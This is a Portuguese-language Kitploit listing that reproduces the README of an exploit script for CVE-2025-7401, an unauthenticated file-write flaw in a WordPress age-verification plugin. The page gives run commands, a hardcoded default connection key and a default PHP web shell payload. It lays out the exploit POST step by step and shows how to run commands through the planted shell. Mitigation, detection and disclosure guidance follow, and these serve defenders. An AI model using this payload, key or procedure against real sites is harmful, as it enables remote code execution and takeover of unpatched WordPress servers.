Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-7401 — Premium Age Verification / Restriction para WordPress <= 3.0.2 - Leitura e Escrita Arbitrária de Arquivos sem Autenticação | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-7401
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2025-7401

CVE-2025-7401

Premium Age Verification / Restriction para WordPress <= 3.0.2 - Leitura e Escrita Arbitrária de Arquivos sem Autenticação

Ver Repositório
213há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-7401

Premium Age Verification / Restriction for WordPress <= 3.0.2 - Leitura e Escrita Arbitrária de Arquivos não Autenticada

🧾 Premium Age Verification / Restriction for WordPress <= 3.0.2 — Leitura e Escrita Arbitrária de Arquivos não Autenticada

📝 Descrição

O plugin "Premium Age Verification / Restriction for WordPress" contém um endpoint de suporte remoto insuficientemente protegido em remote_tunnel.php. Nas versões afetadas até e incluindo a 3.0.2, este endpoint pode ser abusado para leitura e escrita arbitrária de arquivos sem autenticação. A exploração bem-sucedida pode expor informações confidenciais ou permitir execução remota de código.

  • CVE: CVE-2025-7401
  • CVSS: 9.8 (Crítico)

⚙️ Visão Geral do Script

  • Nome do script: CVE-2025-7401.py
  • Finalidade: Uma ferramenta de teste para profissionais de segurança autorizados validarem o comportamento de escrita de arquivos no endpoint vulnerável do plugin. O script normaliza o alvo, codifica um trecho PHP fornecido pelo usuário, envia um POST para o endpoint vulnerável para tentar escrever um arquivo e, opcionalmente, verifica o caminho do arquivo acessível pela web.

▶️ Exemplos de Uso Rápido

root@kitploit:~
# Básico (usa a chave de conexão padrão e o shell PHP padrão)
python CVE-2025-7401.py -u example.com

# Usar HTTPS e chave de conexão personalizada, pular verificação
python CVE-2025-7401.py -u https://target.example -key YOUR_KEY --no-verify

# Payload PHP personalizado (somente testes autorizados)
python CVE-2025-7401.py -u target.com -shell '<?= system($_GET["cmd"]); ?>'

🧭 Opções de Linha de Comando

FlagTipoPadrãoDescrição
-u, --urlstringobrigatórioDomínio alvo ou URL parcial. O script acrescentará o endpoint do plugin quando necessário. Exemplos: example.com, https://example.com, example.com/wp-content/plugins/age-restriction/.
-key, --keystring330489965d8266a739442ef890f57805Chave de conexão usada pelo endpoint de suporte remoto. Substitua para alvos de laboratório, se necessário.
-shell, --shellstring<?= system($_GET["cmd"]); ?>Trecho PHP a ser injetado como conteúdo do arquivo. Altere apenas para testes autorizados.
--no-verifyflagfalseSe presente, o script não realizará a verificação GET opcional do arquivo gravado.

📋 Comportamento Detalhado do Script (Passo a Passo)

EtapaAçãoDetalhes
1Normalização de entradaAceita entrada do usuário (domínio ou caminho parcial). Garante o esquema (http:// se ausente), remove barras duplicadas e acrescenta /wp-content/plugins/age-restriction/modules/remote_support/remote_tunnel.php se o endpoint não estiver presente.
2Construção de cabeçalhosCria cabeçalhos HTTP de solicitação realistas (seleção rotativa de user-agent, Accept, Referer, Content-Type).
3Codificação do payloadCodifica em Base64 o trecho PHP fornecido e o coloca em file_content.
4Requisição de exploração POSTEnvia connection_key, action=save_file, file (caminho do servidor) e file_content para o endpoint normalizado remote_tunnel.php via application/x-www-form-urlencoded.
5Análise da respostaTenta analisar o JSON do corpo da resposta. Se houver JSON, exibe status e file_path; caso contrário, exibe a resposta bruta limpa.
6Verificação (opcional)Tenta um GET para /wp-content/plugins/age-restriction/modules/remote_support/remote_init.php?cmd=whoami para verificar se o arquivo injetado está acessível e retorna conteúdo. Opcional via --no-verify.
7RelatórioExibe um relatório estruturado e legível, incluindo o endpoint usado, status HTTP, JSON analisado (se houver), URL esperada do shell e saída de verificação truncada (se bem-sucedida).

📌 Resultados Esperados e Seus Significados

Campo de SaídaSignificadoExemplo
Endpoint alvoURL normalizada final contatada (caminho completo para remote_tunnel.php).http://example.com/wp-content/.../remote_tunnel.php
Código de Status HTTPCódigo de resposta HTTP da requisição POST. 200 geralmente indica que a requisição foi processada.200
Status JSON da respostaSe o endpoint retornar JSON, o campo status informa sucesso/falha.valid
file_path JSON da respostaCaminho no lado do servidor retornado pelo endpoint mostrando onde o arquivo foi gravado (informativo)./var/www/html/wp-content/.../remote_init.php
Resposta brutaCorpo da resposta não JSON (limpo), como avisos ou mensagens do PHP.Notice: ...
URL do shell (esperada)URL pública onde o arquivo injetado seria acessível. Use apenas para verificação em testes autorizados.http://example.com/wp-content/.../remote_init.php?cmd=whoami
Status HTTP da verificaçãoStatus HTTP da verificação GET opcional.200
Corpo da verificação (truncado)Primeiros N caracteres do corpo da resposta de verificação (útil para ver a saída do comando).www-data

🛡️ Mitigação e Recomendações

  • Atualize o plugin imediatamente para uma versão corrigida fornecida pelo fornecedor.
  • Restrinja o acesso às funções de suporte remoto com autenticação e verificações de autorização adequadas.
  • Sanitize e valide todos os caminhos de arquivo e conteúdos de arquivo fornecidos pelo usuário no lado do servidor.
  • Aplique permissões estritas do sistema de arquivos impedindo que o usuário web crie arquivos executáveis na raiz web.
  • Implemente regras de WAF para detectar e bloquear requisições suspeitas a remote_tunnel.php.

🔎 Detecção e Forense

  • Inspecione os logs do servidor web em busca de requisições POST para /wp-content/plugins/age-restriction/modules/remote_support/remote_tunnel.php com os parâmetros: action=save_file, file, file_content.
  • Procure no diretório do plugin por arquivos inesperados, como remote_init.php.
  • Procure por payloads codificados em Base64 nos corpos das requisições POST.
  • Correlacione os carimbos de data/hora das alterações de arquivos com requisições suspeitas.

🤝 Divulgação Responsável

Se você descobrir esta vulnerabilidade em infraestrutura de terceiros:

  • NÃO explore ou altere sistemas de produção.
  • Entre em contato com o proprietário do site ou o fornecedor do plugin de forma privada e segura.
  • Forneça etapas reproduzíveis ao fornecedor e permita um prazo razoável para remediação antes de qualquer divulgação pública.

⚖️ Aviso Legal e de Segurança

O uso não autorizado de ferramentas de teste de vulnerabilidades é ilegal em muitas jurisdições. Este repositório e script destinam-se exclusivamente à pesquisa defensiva, testes autorizados e divulgação coordenada de vulnerabilidades. Sempre obtenha permissão explícita por escrito antes de testar sistemas que você não possui.


❗ Isenção de Responsabilidade

O autor e os colaboradores não assumem responsabilidade pelo uso indevido das informações ou ferramentas. Use este material apenas dentro dos limites legais e éticos.


Por: Nxploited ( Khaled Alenazi )

Baixar ferramenta